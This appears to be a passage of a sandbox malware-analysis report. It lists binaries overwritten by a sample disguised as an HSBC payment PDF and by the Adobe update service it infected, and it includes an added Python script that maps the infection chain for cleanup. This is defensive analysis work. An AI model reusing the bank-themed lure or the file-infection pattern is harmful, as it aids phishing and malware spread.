                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\firefox.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\plugin-container.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files\Mozilla Firefox\updater.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe File written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\vds.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\alg.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zFM.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\snmptrap.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\Spectrum.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\Locator.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7z.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\AppVClient.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\SysWOW64\perfhost.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zG.exe
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
                  Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
                  Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
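The "System file written" evidence above has a two-stage shape worth pulling out when triaging this report: the submitted sample overwrites a handful of binaries itself, among them C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe (the Adobe Acrobat Update Service executable), and the remaining writes are attributed to that armsvc.exe, i.e. to a host binary the sample had already infected. Everything the infected service touched is therefore a remediation target even though Adobe's own process name appears in the Source column. The script below is an added example written for this page, not Joe Sandbox code and not part of the report; it parses a subset of the evidence lines exactly as they appear above (fused "Jump to behavior" link text included), rebuilds the write chain from the sample, and buckets the overwritten paths for remediation. The function names, the depth model and the Windows-vs-third-party split are this example's own assumptions; the infection-depth reading of the Source column is the editor's inference from the report, not a statement the report makes.

```python
"""Rebuild the write chain from Joe Sandbox 'System file written' evidence.

Added example for this report page; not Joe Sandbox code. EVIDENCE is a
subset of the evidence lines shown above, copied as exported (some still
carry the fused 'Jump to behavior' link text). Everything else is assumed.
"""
import re
from collections import defaultdict, deque

EVIDENCE = r"""
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\msiexec.exeJump to behavior
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe System file written: C:\Windows\System32\Locator.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\VSSVC.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe System file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
"""

# Writer and target are separated only by the literal signature label in the
# export, and the trailing link text may be glued to the target path.
LINE_RE = re.compile(
    r"^Source:\s*(?P<writer>.+?)\s*System file written:\s*"
    r"(?P<target>.+?)\s*(?:Jump to (?:behavior|dropped file))?\s*$",
    re.IGNORECASE,
)


def parse_evidence(text):
    """Return unique (writer, target) edges in first-seen order.

    Paths are deduplicated case-insensitively: NTFS is, and the report itself
    mixes case for the sample's own file name.
    """
    edges, seen = [], set()
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        edge = (m["writer"].strip(), m["target"].strip())
        key = (edge[0].lower(), edge[1].lower())
        if key not in seen:
            seen.add(key)
            edges.append(edge)
    return edges


def write_graph(edges):
    """Adjacency list keyed by lower-cased writer path."""
    g = defaultdict(list)
    for writer, target in edges:
        g[writer.lower()].append(target)
    return g


def write_depths(edges, root):
    """BFS from the submitted sample. Depth 1 = overwritten by the sample,
    depth 2 = overwritten by a binary the sample had already infected."""
    g = write_graph(edges)
    depth, queue = {}, deque([(root, 0)])
    while queue:
        node, d = queue.popleft()
        for target in g.get(node.lower(), []):
            if target.lower() not in depth:
                depth[target.lower()] = d + 1
                queue.append((target, d + 1))
    return depth


def propagating_binaries(edges):
    """Targets that later show up as writers: the host binaries through which
    the infection spread (lower-cased, sorted)."""
    targets = {t.lower() for _, t in edges}
    writers = {w.lower() for w, _ in edges}
    return sorted(targets & writers)


def classify(path):
    """Remediation bucket (assumed split): Windows components can be checked
    against the component store and restored with sfc; third-party binaries
    need reinstalling from vendor media. Re-verify hashes either way."""
    return "windows" if path.lower().startswith("c:\\windows\\") else "third-party"


def remediation_plan(edges, root):
    """Every path reachable from the sample, grouped by bucket and sorted."""
    reachable = write_depths(edges, root)
    plan = {"windows": [], "third-party": []}
    for _, target in edges:
        if target.lower() in reachable and target not in plan[classify(target)]:
            plan[classify(target)].append(target)
    for bucket in plan.values():
        bucket.sort(key=str.lower)
    return plan


if __name__ == "__main__":
    sample = r"C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
    edges = parse_evidence(EVIDENCE)
    depths = write_depths(edges, sample)
    for writer, target in edges:
        print(f"depth {depths[target.lower()]}: {writer}  ->  {target}")
    print("spread through:", propagating_binaries(edges))
    print(remediation_plan(edges, sample))
```

On the full list this yields depth 1 for the System32 services and browser elevation services the sample writes directly and depth 2 for everything attributed to armsvc.exe; the duplicate 7zFM.exe entry collapses to one edge. The "File created" evidence further down repeats most of these paths and can be fed through the same parser by widening the label in LINE_RE.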
Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe | File created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Windows\System32\vds.exe
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
